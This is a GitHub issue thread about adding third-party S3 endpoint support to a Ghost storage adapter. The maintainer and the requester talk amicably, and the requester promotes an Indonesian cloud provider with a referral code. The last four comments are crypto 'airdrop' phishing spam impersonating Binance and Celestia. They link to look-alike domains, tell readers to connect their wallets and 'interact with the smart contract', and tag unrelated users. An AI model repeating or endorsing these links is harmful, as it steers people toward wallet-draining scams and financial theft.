### ISSUE TITLE
Make This Possible for 3rd Party S3 Providers

### ISSUE THREAD

**Issue by rkafp** [aea7/ghost-adapter-s3#1]
If you don't mind, it would be better if you add this feature

**Comment by aea7** [comment]
@rkafp thanks for your comment, I stopped using Ghost altogether, feel free to add it, I am not sure this library even works now 😄

**Comment by rkafp** [comment]
Thank you for your response. By the way, may I know why you don't use Ghost anymore?

**Comment by aea7** [comment]
> Thank you for your response. By the way, may I know why you don't use Ghost anymore?

Of course, we used it in my previous company as a headless CMS, now we are using https://graphcms.com/ 

For a personal project or a freelance project I would actually consider Ghost again for sure =) 

How did you find this adapter anyway? It was specific to our needs, it's as simple as they come 😄  There must be new ones, what's the problem you are having with Ghost?

**Comment by rkafp** [comment]
> > Thank you for your response. By the way, may I know why you don't use Ghost anymore?
> 
> Of course, we used it in my previous company as a headless CMS, now we are using https://graphcms.com/
> 
> For a personal project or a freelance project I would actually consider Ghost again for sure =)
> 
> How did you find this adapter anyway? It was specific to our needs, it's as simple as they come 😄 There must be new ones, what's the problem you are having with Ghost?

So that's the story, thank you for sharing!

I found this repository by searching it with a "recently updated" filter.

I have a problem with the endpoint, most of the libraries available for S3 only support AWS. Whereas I use Cloud Object Storage with S3 protocol provided by startup that comes from my country.

I've managed to solve my problem by using another library, but by changing some parts to suit my needs

Maybe, you can close this issue ;)

Again, thank you in advance ☺

**Comment by aea7** [comment]
> > > Thank you for your response. By the way, may I know why you don't use Ghost anymore?
> > 
> > 
> > Of course, we used it in my previous company as a headless CMS, now we are using https://graphcms.com/
> > For a personal project or a freelance project I would actually consider Ghost again for sure =)
> > How did you find this adapter anyway? It was specific to our needs, it's as simple as they come 😄 There must be new ones, what's the problem you are having with Ghost?
> 
> So that's the story, thank you for sharing!
> 
> I found this repository by searching it with a "recently updated" filter.
> 
> I have a problem with the endpoint, most of the libraries available for S3 only support AWS. Whereas I use Cloud Object Storage with S3 protocol provided by startup that comes from my country.
> 
> I've managed to solve my problem by using another library, but by changing some parts to suit my needs
> 
> Maybe, you can close this issue ;)
> 
> Again, thank you in advance ☺

That's cool! May I ask the name of the company that provides object storage using S3 protocol? Sounds interesting 😄

**Comment by rkafp** [comment]
IDCloudHost - idcloudhost.com

For Cloud Object Storage: https://console.idcloudhost.com/


You can use my referral code to get a bonus (free balance) on the dashboard for 50000 IDR after the first top up/payment, if you want to ➜ https://console.idcloudhost.com/referral/723wmd (**723wmd**)

_As I remember the minimum to top up is 50000 IDR_  (with 10% tax, then the total bill is 55000 IDR). So if You use my referral code, You will get 100000 IDR.


There are no other fees such as bandwidth/data transfer, etc. You only need to pay a monthly fee for storage (Price is 507 IDR /GB).

Is it cheaper than AWS itself? (https://calculator.aws/#/createCalculator/S3)

![image](https://user-images.githubusercontent.com/51822757/135365692-95db7230-ed23-4c60-a1f1-f727b3f8ad62.png)


For international payments, they support Visa/Mastercard and the dashboard is in English.

I don't think they have much documentation/guidance regarding their Cloud Object Storage service, because this new service was just released a few months ago.

You can also independently create a custom domain for the provided 'endpoint', although this option is not officially available yet.


**Estimated currency conversion**:
50K IDR = 3.49 USD;
500 IDR = 0.035 USD.

**Comment by Vishnuraj2mail** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Participantes: @abhi5154, @tawhan695, @tosmart01, @gamankr, @0xking-sol

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @likegogogo, @osmantamer, @SYMPH0N3Y, @hoofdaphobia, @0trade, @ser-art, @MaximeMarteau, @laziz07, @caokyhieu, @521314

**Comment by YourNPC** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @nieyuda, @woodyxiong, @lxj0276, @jlfan99, @we1h0, @rayxiong831, @Huoran559

**Comment by redtree0** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!nthienan, @gbertb, @attttt17, @leoyoung0, @lorenzopalaia, @virlaser, @gawd-coder, @kilerbps, @integratorivan, @kelvodcardo, @alebaffa, @smypmsa, @sakawasser, @abhi5800, @carlbarrdahl, @Jp3stephens, @kyo-torstar, @meowmeow69420, @SSB2018, @orbxball
